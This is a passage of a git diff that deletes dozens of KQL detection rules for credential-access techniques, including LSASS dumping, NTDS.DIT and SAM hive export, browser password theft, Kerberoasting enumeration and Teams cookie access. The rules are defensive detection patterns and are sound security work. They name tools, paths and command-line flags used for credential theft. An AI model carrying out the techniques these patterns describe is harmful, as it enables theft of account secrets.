-// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
-// Tags: attack.credential_access
-DeviceFileEvents
-| where FolderPath endswith "\\NPPSpy.txt" or FolderPath endswith "\\NPPSpy.dll"
\ No newline at end of file
diff --git a/Credential Access/NTDS.DIT_Created.kql b/Credential Access/NTDS.DIT_Created.kql
deleted file mode 100644
index 09925740..00000000
--- a/Credential Access/NTDS.DIT_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: low
-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database)
-// Tags: attack.credential_access, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "ntds.dit"
\ No newline at end of file
diff --git a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql b/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql
deleted file mode 100644
index e4c7f6cf..00000000
--- a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/11
-// Level: high
-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
-// Tags: attack.credential_access, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessParentFileName in~ ("cscript.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "powershell.exe", "pwsh.exe", "w3wp.exe", "wscript.exe")) or (InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith ""))
\ No newline at end of file
diff --git a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql b/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 82bd459b..00000000
--- a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/11
-// Level: high
-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") or (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\"))
\ No newline at end of file
diff --git a/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql b/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql
deleted file mode 100644
index ab57a2e4..00000000
--- a/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/11
-// Level: high
-// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
-// Tags: attack.credential_access, attack.t1003.003
-DeviceFileEvents
-| where FolderPath endswith "\\All.cab" or FolderPath endswith ".ntds.cleartext"
\ No newline at end of file
diff --git a/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql b/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql
deleted file mode 100644
index 4a27d643..00000000
--- a/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/03
-// Level: medium
-// Description: Detects usage of "cmdkey.exe" to add generic credentials.
-As an example, this can be used before connecting to an RDP session via command line interface.
-
-// Tags: attack.credential_access, attack.t1003.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g") and (ProcessCommandLine contains " -p" or ProcessCommandLine contains " /p") and (ProcessCommandLine contains " -u" or ProcessCommandLine contains " /u") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql b/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql
deleted file mode 100644
index fb03775e..00000000
--- a/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kutepov Anton, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql b/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql
deleted file mode 100644
index fc358165..00000000
--- a/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020/07/04
-// Level: high
-// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where FolderPath endswith "\\ditsnap.exe" or ProcessCommandLine contains "ditsnap.exe"
\ No newline at end of file
diff --git a/Credential Access/PUA_-_Mouse_Lock_Execution.kql b/Credential Access/PUA_-_Mouse_Lock_Execution.kql
deleted file mode 100644
index cad3d884..00000000
--- a/Credential Access/PUA_-_Mouse_Lock_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Cian Heasley
-// Date: 2020/08/13
-// Level: medium
-// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
-// Tags: attack.credential_access, attack.collection, attack.t1056.002
-DeviceProcessEvents
-| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_"
\ No newline at end of file
diff --git a/Credential Access/PUA_-_WebBrowserPassView_Execution.kql b/Credential Access/PUA_-_WebBrowserPassView_Execution.kql
deleted file mode 100644
index 09a3fc49..00000000
--- a/Credential Access/PUA_-_WebBrowserPassView_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: medium
-// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera
-// Tags: attack.credential_access, attack.t1555.003
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "Web Browser Password Viewer" or FolderPath endswith "\\WebBrowserPassView.exe"
\ No newline at end of file
diff --git a/Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql b/Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql
deleted file mode 100644
index 0d6a0ceb..00000000
--- a/Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: medium
-// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured files or folders permissions
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\"Everyone\"" or ProcessCommandLine contains "'Everyone'" or ProcessCommandLine contains "\"BUILTIN\\\"" or ProcessCommandLine contains "'BUILTIN\\'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains "icacls " and ProcessCommandLine contains "findstr " and ProcessCommandLine contains "Everyone")
\ No newline at end of file
diff --git a/Credential Access/PktMon.EXE_Execution.kql b/Credential Access/PktMon.EXE_Execution.kql
deleted file mode 100644
index 6b203914..00000000
--- a/Credential Access/PktMon.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/17
-// Level: medium
-// Description: Detects execution of PktMon, a tool that captures network packets.
-// Tags: attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where FolderPath endswith "\\pktmon.exe" or ProcessVersionInfoOriginalFileName =~ "PktMon.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Browser_Data_Stealing.kql b/Credential Access/Potential_Browser_Data_Stealing.kql
deleted file mode 100644
index e03af167..00000000
--- a/Credential Access/Potential_Browser_Data_Stealing.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: medium
-// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
-Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
-Web browsers typically store the credentials in an encrypted format within a credential store.
-
-// Tags: attack.credential_access, attack.t1555.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") or (FolderPath endswith "\\xcopy.exe" or FolderPath endswith "\\robocopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("XCOPY.EXE", "robocopy.exe"))) and (ProcessCommandLine contains "\\Amigo\\User Data" or ProcessCommandLine contains "\\BraveSoftware\\Brave-Browser\\User Data" or ProcessCommandLine contains "\\CentBrowser\\User Data" or ProcessCommandLine contains "\\Chromium\\User Data" or ProcessCommandLine contains "\\CocCoc\\Browser\\User Data" or ProcessCommandLine contains "\\Comodo\\Dragon\\User Data" or ProcessCommandLine contains "\\Elements Browser\\User Data" or ProcessCommandLine contains "\\Epic Privacy Browser\\User Data" or ProcessCommandLine contains "\\Google\\Chrome Beta\\User Data" or ProcessCommandLine contains "\\Google\\Chrome SxS\\User Data" or ProcessCommandLine contains "\\Google\\Chrome\\User Data\\" or ProcessCommandLine contains "\\Kometa\\User Data" or ProcessCommandLine contains "\\Maxthon5\\Users" or ProcessCommandLine contains "\\Microsoft\\Edge\\User Data" or ProcessCommandLine contains "\\Mozilla\\Firefox\\Profiles" or ProcessCommandLine contains "\\Nichrome\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera GX Stable\\" or ProcessCommandLine contains "\\Opera Software\\Opera Neon\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera Stable\\" or ProcessCommandLine contains "\\Orbitum\\User Data" or ProcessCommandLine contains "\\QIP Surf\\User Data" or ProcessCommandLine contains "\\Sputnik\\User Data" or ProcessCommandLine contains "\\Torch\\User Data" or ProcessCommandLine contains "\\uCozMedia\\Uran\\User Data" or ProcessCommandLine contains "\\Vivaldi\\User Data")
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql b/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql
deleted file mode 100644
index 8c7d33c2..00000000
--- a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_CLI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/23
-// Level: high
-// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Services\\" and ProcessCommandLine contains "\\NetworkProvider"
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql b/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql
deleted file mode 100644
index e4ed3b9c..00000000
--- a/Credential Access/Potential_Credential_Dumping_Attempt_Using_New_NetworkProvider_-_REG.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/23
-// Level: medium
-// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
-// Tags: attack.credential_access, attack.t1003
-DeviceRegistryEvents
-| where (RegistryKey contains "\\System\\CurrentControlSet\\Services" and RegistryKey contains "\\NetworkProvider") and (not(((RegistryKey contains "\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe")))
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql b/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql
deleted file mode 100644
index 374f0565..00000000
--- a/Credential Access/Potential_Credential_Dumping_Via_LSASS_Process_Clone.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Samir Bousseaden
-// Date: 2021/11/27
-// Level: critical
-// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
-// Tags: attack.credential_access, attack.t1003, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Windows\\System32\\lsass.exe" and InitiatingProcessFolderPath endswith "\\Windows\\System32\\lsass.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql b/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql
deleted file mode 100644
index 1e6f67d2..00000000
--- a/Credential Access/Potential_Credential_Dumping_Via_LSASS_SilentProcessExit_Technique.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/26
-// Level: critical
-// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
-// Tags: attack.credential_access, attack.t1003.001
-DeviceRegistryEvents
-| where RegistryKey contains "Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Credential_Dumping_Via_WER.kql b/Credential Access/Potential_Credential_Dumping_Via_WER.kql
deleted file mode 100644
index 0e1eb68b..00000000
--- a/Credential Access/Potential_Credential_Dumping_Via_WER.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @pbssubhash , Nasreddine Bencherchali
-// Date: 2022/12/08
-// Level: high
-// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " -u -p " and ProcessCommandLine contains " -ip " and ProcessCommandLine contains " -s ") and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and (FolderPath endswith "\\Werfault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe"))
\ No newline at end of file
diff --git a/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql b/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql
deleted file mode 100644
index 10980eef..00000000
--- a/Credential Access/Potential_Data_Stealing_Via_Chromium_Headless_Debugging.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
-// Tags: attack.credential_access, attack.t1185
-DeviceProcessEvents
-| where ProcessCommandLine contains "--remote-debugging-" and ProcessCommandLine contains "--user-data-dir" and ProcessCommandLine contains "--headless"
\ No newline at end of file
diff --git a/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql b/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql
deleted file mode 100644
index 2d6086da..00000000
--- a/Credential Access/Potential_LSASS_Process_Dump_Via_Procdump.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/10/30
-// Level: high
-// Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process.
-This way we are also able to catch cases in which the attacker has renamed the procdump executable.
-
-// Tags: attack.defense_evasion, attack.t1036, attack.credential_access, attack.t1003.001, car.2013-05-009
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and ProcessCommandLine contains " ls"
\ No newline at end of file
diff --git a/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql b/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql
deleted file mode 100644
index a9505cd1..00000000
--- a/Credential Access/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
-Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
-An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe"
\ No newline at end of file
diff --git a/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql b/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql
deleted file mode 100644
index 7fe3ec0c..00000000
--- a/Credential Access/Potential_Reconnaissance_For_Cached_Credentials_Via_Cmdkey.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects usage of cmdkey to look for cached credentials on the system
-// Tags: attack.credential_access, attack.t1003.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -l" or ProcessCommandLine contains " /l") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql b/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql
deleted file mode 100644
index 961665a6..00000000
--- a/Credential Access/Potential_Remote_Credential_Dumping_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: SecurityAura
-// Date: 2022/11/16
-// Level: high
-// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
-// Tags: attack.credential_access, attack.t1003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath matches regex "\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$"
\ No newline at end of file
diff --git a/Credential Access/Potential_SAM_Database_Dump.kql b/Credential Access/Potential_SAM_Database_Dump.kql
deleted file mode 100644
index e28af050..00000000
--- a/Credential Access/Potential_SAM_Database_Dump.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/11
-// Level: high
-// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager)
-// Tags: attack.credential_access, attack.t1003.002
-DeviceFileEvents
-| where (FolderPath endswith "\\Temp\\sam" or FolderPath endswith "\\sam.sav" or FolderPath endswith "\\Intel\\sam" or FolderPath endswith "\\sam.hive" or FolderPath endswith "\\Perflogs\\sam" or FolderPath endswith "\\ProgramData\\sam" or FolderPath endswith "\\Users\\Public\\sam" or FolderPath endswith "\\AppData\\Local\\sam" or FolderPath endswith "\\AppData\\Roaming\\sam" or FolderPath endswith "_ShadowSteal.zip" or FolderPath endswith "\\Documents\\SAM.export" or FolderPath endswith ":\\sam") or (FolderPath contains "\\hive_sam_" or FolderPath contains "\\sam.save" or FolderPath contains "\\sam.export" or FolderPath contains "\\~reg_sam.save" or FolderPath contains "\\sam_backup" or FolderPath contains "\\sam.bck" or FolderPath contains "\\sam.backup")
\ No newline at end of file
diff --git a/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql b/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql
deleted file mode 100644
index 7a9ae968..00000000
--- a/Credential Access/Potential_SPN_Enumeration_Via_Setspn.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, keepwatch
-// Date: 2018/11/14
-// Level: medium
-// Description: Detects service principal name (SPN) enumeration used for Kerberoasting
-// Tags: attack.credential_access, attack.t1558.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q ") and (FolderPath endswith "\\setspn.exe" or ProcessVersionInfoOriginalFileName =~ "setspn.exe" or (ProcessVersionInfoFileDescription contains "Query or reset the computer" and ProcessVersionInfoFileDescription contains "SPN attribute"))
\ No newline at end of file
diff --git a/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Credential Access/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql b/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql
deleted file mode 100644
index 7f64931f..00000000
--- a/Credential Access/Potential_Windows_Defender_Tampering_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic
-// Tags: attack.credential_access, attack.t1546.008
-DeviceProcessEvents
-| where ProcessCommandLine contains "/Namespace:\\\\root\\Microsoft\\Windows\\Defender" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql b/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql
deleted file mode 100644
index b4845455..00000000
--- a/Credential Access/Potentially_Suspicious_Command_Targeting_Teams_Sensitive_Files.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: @SerkinValery
-// Date: 2022/09/16
-// Level: medium
-// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
-The database might contain authentication tokens and other sensitive information about the logged in accounts.
-
-// Tags: attack.credential_access, attack.t1528
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Microsoft\\Teams\\Cookies" or ProcessCommandLine contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(FolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql b/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql
deleted file mode 100644
index 5a9213f4..00000000
--- a/Credential Access/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
-This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1552
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-InstanceId 4624" or ProcessCommandLine contains "System[EventID=4624]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4624") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4624") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" or ProcessCommandLine contains "Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational" or ProcessCommandLine contains "Security")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
diff --git a/Credential Access/PowerShell_Get-Process_LSASS.kql b/Credential Access/PowerShell_Get-Process_LSASS.kql
deleted file mode 100644
index 6a75f82e..00000000
--- a/Credential Access/PowerShell_Get-Process_LSASS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/04/23
-// Level: high
-// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
-// Tags: attack.credential_access, attack.t1552.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "Get-Process lsas" or ProcessCommandLine contains "ps lsas" or ProcessCommandLine contains "gps lsas"
\ No newline at end of file
diff --git a/Credential Access/PowerShell_SAM_Copy.kql b/Credential Access/PowerShell_SAM_Copy.kql
deleted file mode 100644
index acf9a4b5..00000000
--- a/Credential Access/PowerShell_SAM_Copy.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/29
-// Level: high
-// Description: Detects suspicious PowerShell scripts accessing SAM hives
-// Tags: attack.credential_access, attack.t1003.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\HarddiskVolumeShadowCopy" and ProcessCommandLine contains "System32\\config\\sam") and (ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "cp $_." or ProcessCommandLine contains "cpi $_." or ProcessCommandLine contains "copy $_." or ProcessCommandLine contains ".File]::Copy(")
\ No newline at end of file
diff --git a/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql b/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql
deleted file mode 100644
index 9feb4708..00000000
--- a/Credential Access/Private_Keys_Reconnaissance_Via_CommandLine_Tools.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/07/20
-// Level: medium
-// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
-// Tags: attack.credential_access, attack.t1552.004
-DeviceProcessEvents
